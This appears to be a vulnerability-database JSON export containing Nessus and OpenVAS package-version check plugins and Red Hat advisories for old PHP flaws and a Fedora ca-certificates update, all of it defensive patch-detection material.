value:\"2020/09/24\");\n\n script_cve_id(\"CVE-2005-3388\");\n script_xref(name:\"FEDORA\", value:\"2020-fb144e7de5\");\n\n script_name(english:\"Fedora 32 : ca-certificates (2020-fb144e7de5)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"updates the mozilla certificate list, removes expired certificates.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-fb144e7de5\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected ca-certificates package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2005-3388\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ca-certificates\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:32\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^32([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 32\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC32\", reference:\"ca-certificates-2020.2.41-1.1.fc32\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ca-certificates\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "redhat": [{"lastseen": "2019-08-13T18:44:48", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3353", "CVE-2005-3388", "CVE-2005-3389", "CVE-2005-3390"], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server.\r\n\r\nA flaw was found in the way PHP registers global variables during a file\r\nupload request. A remote attacker could submit a carefully crafted\r\nmultipart/form-data POST request that would overwrite the $GLOBALS array,\r\naltering expected script behavior, and possibly leading to the execution of\r\narbitrary PHP commands. Please note that this vulnerability only affects\r\ninstallations which have register_globals enabled in the PHP configuration\r\nfile, which is not a default or recommended option. The Common\r\nVulnerabilities and Exposures project assigned the name CVE-2005-3390 to\r\nthis issue.\r\n\r\nA flaw was found in the PHP parse_str() function. If a PHP script passes\r\nonly one argument to the parse_str() function, and the script can be forced\r\nto abort execution during operation (for example due to the memory_limit\r\nsetting), the register_globals may be enabled even if it is disabled in the\r\nPHP configuration file. This vulnerability only affects installations that\r\nhave PHP scripts using the parse_str function in this way. (CVE-2005-3389)\r\n\r\nA Cross-Site Scripting flaw was found in the phpinfo() function. If a\r\nvictim can be tricked into following a malicious URL to a site with a page\r\ndisplaying the phpinfo() output, it may be possible to inject javascript\r\nor HTML content into the displayed page or steal data such as cookies. \r\nThis vulnerability only affects installations which allow users to view the\r\noutput of the phpinfo() function. As the phpinfo() function outputs a\r\nlarge amount of information about the current state of PHP, it should only\r\nbe used during debugging or if protected by authentication. (CVE-2005-3388)\r\n\r\nA denial of service flaw was found in the way PHP processes EXIF image\r\ndata. It is possible for an attacker to cause PHP to crash by supplying\r\ncarefully crafted EXIF image data. (CVE-2005-3353)\r\n\r\nUsers of PHP should upgrade to these updated packages, which contain\r\nbackported patches that resolve these issues.", "modified": "2017-09-08T12:07:16", "published": "2005-11-10T05:00:00", "id": "RHSA-2005:831", "href": "https://access.redhat.com/errata/RHSA-2005:831", "type": "redhat", "title": "(RHSA-2005:831) php security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:20", "bulletinFamily": "unix", "cvelist": ["CVE-2004-1018", "CVE-2004-1019"], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nA double-free bug was found in the deserialization code of PHP. PHP\napplications use the unserialize function on untrusted user data, which\ncould allow a remote attacker to gain access to memory or potentially\nexecute arbitrary code. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CAN-2004-1019 to this issue.\n\nFlaws were found in the pack and unpack PHP functions. These functions\ndo not normally pass user supplied data, so they would require a malicious\nPHP script to be exploited. The Common Vulnerabilities and Exposures\nproject (cve.mitre.org) has assigned the name CAN-2004-1018 to this issue.\n\nA bug was discovered in the initialization of the OpenSSL library, such\nthat the curl extension could not be used to perform HTTP requests over SSL\nunless the php-imap package was installed.\n\nUsers of PHP should upgrade to these updated packages, which contain fixes\nfor these issues.", "modified": "2018-03-14T19:28:10", "published": "2005-01-19T05:00:00", "id": "RHSA-2005:031", "href": "https://access.redhat.com/errata/RHSA-2005:031", "type": "redhat", "title": "(RHSA-2005:031) php security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:54", "bulletinFamily": "unix", "cvelist": ["CVE-2004-1018", "CVE-2004-1019", "CVE-2004-1065"], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nFlaws including possible information disclosure, double free, and negative\nreference index array underflow were found in the deserialization code of\nPHP. PHP applications may use the unserialize function on untrusted user\ndata, which could allow a remote attacker to gain access to memory or\npotentially execute arbitrary code. The Common Vulnerabilities and\nExposures project (cve.mitre.org) has assigned the name CAN-2004-1019 to\nthis issue.\n\nA flaw in the exif extension of PHP was found which lead to a stack\noverflow. An attacker could create a carefully crafted image file in such\na way which, if parsed by a PHP script using the exif extension, could\ncause a crash or potentially execute arbitrary code. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the name\nCAN-2004-1065 to this issue.\n\nFlaws were found in shmop_write, pack, and unpack PHP functions. These\nfunctions are not normally passed user supplied data, so would require a\nmalicious PHP script to be exploited. The Common Vulnerabilities and\nExposures project (cve.mitre.org) has assigned the name CAN-2004-1018 to\nthis issue.\n\nUsers of PHP should upgrade to these updated packages, which contain fixes\nfor these issues.", "modified": "2017-09-08T11:51:21", "published": "2005-02-15T05:00:00", "id": "RHSA-2005:032", "href": "https://access.redhat.com/errata/RHSA-2005:032", "type": "redhat", "title": "(RHSA-2005:032) php security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:58", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0958", "CVE-2004-0959", "CVE-2004-1018", "CVE-2004-1019", "CVE-2004-1065"], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nFlaws including possible information disclosure, double free, and negative\nreference index array underflow were found in the deserialization code of\nPHP. PHP applications may use the unserialize function on untrusted user\ndata, which could allow a remote attacker to gain access to memory or\npotentially execute arbitrary code. The Common Vulnerabilities and\nExposures project (cve.mitre.org) has assigned the name CAN-2004-1019 to\nthis issue.\n\nA flaw in the exif extension of PHP was found which lead to a stack\noverflow. An attacker could create a carefully crafted image file in such\na way that if parsed by a PHP script using the exif extension it could\ncause a crash or potentially execute arbitrary code. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the name\nCAN-2004-1065 to this issue.\n\nAn information disclosure bug was discovered in the parsing of \"GPC\"\nvariables in PHP (query strings or cookies, and POST form data). If\nparticular scripts used the values of the GPC variables, portions of the\nmemory space of an httpd child process could be revealed to the client. \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CAN-2004-0958 to this issue.\n\nA file access bug was discovered in the parsing of \"multipart/form-data\"\nforms, used by PHP scripts which allow file uploads. In particular\nconfigurations, some scripts could allow a malicious client to upload files\nto an arbitrary directory where the \"apache\" user has write access. The\nCommon Vulnerabilities and Exposures project (cve.mitre.org) has assigned\nthe name CAN-2004-0959 to this issue.\n\nFlaws were found in shmop_write, pack, and unpack PHP functions. These\nfunctions are not normally passed user supplied data, so would require a\nmalicious PHP script to be exploited. The Common Vulnerabilities and\nExposures project (cve.mitre.org) has assigned the name CAN-2004-1018 to\nthis issue.\n\nVarious issues were discovered in the use of the \"select\" system call in\nPHP, which could be triggered if PHP is used in an Apache configuration\nwhere the number of open files (such as virtual host log files) exceeds the\ndefault process limit of 1024. Workarounds are now included for some of\nthese issues.\n\nThe \"phpize\" shell script included in PHP can be used to build third-party\nextension modules. A build issue was discovered in the \"phpize\" script on\nsome 64-bit platforms which prevented correct operation.\n\nThe \"pcntl\" extension module is now enabled in the command line PHP\ninterpreter, /usr/bin/php. This module enables process control features \nsuch as \"fork\" and \"kill\" from PHP scripts.\n\nUsers of PHP should upgrade to these updated packages, which contain fixes\nfor these issues.", "modified": "2017-07-29T20:27:18", "published": "2004-12-21T05:00:00", "id": "RHSA-2004:687", "href": "https://access.redhat.com/errata/RHSA-2004:687", "type": "redhat", "title": "(RHSA-2004:687) php security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2018-04-06T11:40:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3353", "CVE-2005-3389", "CVE-2005-3390"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n mod_php4-core\n php4-session\n php4\n php4-imap\n apache-mod_php4\n php4-servlet\n php4-sysvshm\n mod_php4-servlet\n php4-mysql\n php4-pear\n php4-fastcgi\n php4-exif\n php4-devel\n apache2-mod_php4\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5010771 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:136141256231065242", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065242", "type": "openvas", "title": "SLES9: Security update for PHP4", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5010771.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for PHP4\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n mod_php4-core\n php4-session\n php4\n php4-imap\n apache-mod_php4\n php4-servlet\n php4-sysvshm\n mod_php4-servlet\n php4-mysql\n php4-pear\n php4-fastcgi\n php4-exif\n php4-devel\n apache2-mod_php4\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5010771 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65242\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2005-3353\", \"CVE-2005-3389\", \"CVE-2005-3390\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"SLES9: Security update for PHP4\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"mod_php4-core\", rpm:\"mod_php4-core~4.3.4~43.46.3\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-26T08:56:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3353", "CVE-2005-3389", "CVE-2005-3390"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n mod_php4-core\n php4-session\n php4\n php4-imap\n apache-mod_php4\n php4-servlet\n php4-sysvshm\n mod_php4-servlet\n php4-mysql\n php4-pear\n php4-fastcgi\n php4-exif\n php4-devel\n apache2-mod_php4\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5010771 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:65242", "href": "http://plugins.openvas.org/nasl.php?oid=65242", "type": "openvas", "title": "SLES9: Security update for PHP4", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5010771.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for PHP4\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n mod_php4-core\n php4-session\n php4\n php4-imap\n apache-mod_php4\n php4-servlet\n php4-sysvshm\n mod_php4-servlet\n php4-mysql\n php4-pear\n php4-fastcgi\n php4-exif\n php4-devel\n apache2-mod_php4\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5010771 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65242);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2005-3353\", \"CVE-2005-3389\", \"CVE-2005-3390\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"SLES9: Security update for PHP4\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"mod_php4-core\", rpm:\"mod_php4-core~4.3.4~43.46.3\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3388", "CVE-2005-3392", "CVE-2005-3054", "CVE-2005-3389", "CVE-2005-3319", "CVE-2005-3391", "CVE-2005-3390"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200511-08.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:55857", "href": "http://plugins.openvas.org/nasl.php?oid=55857", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200511-08 (PHP)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP suffers from multiple issues, resulting in security functions bypass,\nlocal Denial of service, cross-site scripting or PHP variables overwrite.\";\ntag_solution = \"All PHP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose dev-php/php\n\nAll mod_php users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose dev-php/mod_php\n\nAll php-cgi users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose dev-php/php-cgi\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200511-08\nhttp://bugs.gentoo.org/show_bug.cgi?id=107602\nhttp://bugs.gentoo.org/show_bug.cgi?id=111032\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200511-08.\";\n\n \n\nif(description)\n{\n script_id(55857);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2005-3054\", \"CVE-2005-3319\", \"CVE-2005-3388\", \"CVE-2005-3389\", \"CVE-2005-3390\", \"CVE-2005-3391\", \"CVE-2005-3392\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200511-08 (PHP)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"dev-php/php\", unaffected: make_list(\"rge 4.3.11-r4\", \"ge 4.4.0-r4\"), vulnerable: make_list(\"lt 4.4.0-r4\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"dev-php/mod_php\", unaffected: make_list(\"rge 4.3.11-r4\", \"ge 4.4.0-r8\"), vulnerable: make_list(\"lt 4.4.0-r8\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"dev-php/php-cgi\", unaffected: make_list(\"rge 4.3.11-r5\", \"ge 4.4.0-r5\"), vulnerable: make_list(\"lt 4.4.0-r5\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3353", "CVE-2005-3388", "CVE-2005-3392", "CVE-2005-3389", "CVE-2005-3319", "CVE-2005-3391", "CVE-2005-3390", "CVE-2005-2491"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-22T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:55777", "href": "http://plugins.openvas.org/nasl.php?oid=55777", "type": "openvas", "title": "PHP -- multiple vulnerabilities", "sourceData": "#\n#VID 6821a2db-4ab7-11da-932d-00055d790c25\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n mod_php4-twig\n php4-cgi\n php4-cli\n php4-dtc\n php4-horde\n php4-nms\n php4\n mod_php\n mod_php4\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://secunia.com/advisories/17371/\nhttp://www.vuxml.org/freebsd/6821a2db-4ab7-11da-932d-00055d790c25.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(55777);\n script_version(\"$Revision: 4128 $\");\n script_cve_id(\"CVE-2005-2491\", \"CVE-2005-3319\", \"CVE-2005-3353\", \"CVE-2005-3388\",\n \"CVE-2005-3389\", \"CVE-2005-3390\", \"CVE-2005-3391\", \"CVE-2005-3392\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-22 07:37:51 +0200 (Thu, 22 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"PHP -- multiple vulnerabilities\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"mod_php4-twig\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.4.1\")<0) {\n txt += 'Package mod_php4-twig version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-cgi\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.4.1\")<0) {\n txt += 'Package php4-cgi version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-cli\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.4.1\")<0) {\n txt += 'Package php4-cli version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-dtc\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.4.1\")<0) {\n txt += 'Package php4-dtc version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-horde\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.4.1\")<0) {\n txt += 'Package php4-horde version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-nms\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.4.1\")<0) {\n txt += 'Package php4-nms version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.4.1\")<0) {\n txt += 'Package php4 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"mod_php\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4\")>=0 && revcomp(a:bver, b:\"4.4.1,1\")<0) {\n txt += 'Package mod_php version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"mod_php4\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4\")>=0 && revcomp(a:bver, b:\"4.4.1,1\")<0) {\n txt += 'Package mod_php4 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-06-25T13:44:36", 